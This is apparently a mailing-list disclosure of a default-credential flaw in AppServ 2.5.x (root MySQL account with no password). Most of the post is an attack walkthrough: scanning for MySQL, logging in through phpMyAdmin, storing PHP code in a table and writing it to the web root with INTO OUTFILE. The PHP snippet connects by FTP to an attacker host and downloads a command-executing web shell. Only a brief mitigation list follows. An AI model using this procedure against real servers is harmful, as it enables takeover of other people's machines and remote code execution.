[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

AppServ 2.5.x and Prior Exploit

what AppServ
AppServ is the Apache/PHP/MySQL open source software installer packages. 

Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms 
such as WindowZ
- Single step installation , no need to perform multiple step, time consuming 
installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after 
you've finished installing.
- If you hate and boring M$ IIS Webserver. 
AppServ URL:http://www.appservnetwork.com

Vulnerability Ver: 2.5.X and prior

problem :

the program comes in default user (Root) and empty password which let attacker 
to contrlor program and computer.


Expliot Method

1)scan tool (SuperScan or whatever) 
this step to scan MySQL service on port 3306

2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE 
(Internet Explorer).
From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx)

3)if we success the index page for AppServ open 

4)Now we can edit the databases and tables in Mysql by phpmyadmin
From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin)

5)default MySQL Server come with two database (test,mysql),our target is (mysql 
Now we can add new table contains our exploit 

- Create New table for example (exploit) with one fild and type TEXT
-insert in database the exploit ( PHP code) like :

$conn_id = ftp_connect("Evil_IP_or_Attacker_ip");
$login_result = ftp_login($conn_id, "Attacker", "Passwd");
$download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", 


the attacker could use " Windows FTP Server" or any FTP daemon, it's not a 
matter :-)
phpshell.php is a script function like (system,passthru,exec ...etc)
you can find nice phpshell here (http://phpfm.sf.net )
the attacker could download EXE file else.

 6)Now we are able to make a query to outfile by use INTO OUTFILE statement .
SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php'

7)Query.php contain Our PHP code 

8)if we success we can reguest 

9)if FTP connection successful and downloaded phpshell.php in the victim PC you 
can send new request like:

10) Game's Over

1)change Root passowrd
2)use firewall for aptche and MySQL Server
3)use Save Mode for your script


                       discovered by  Saudi Linux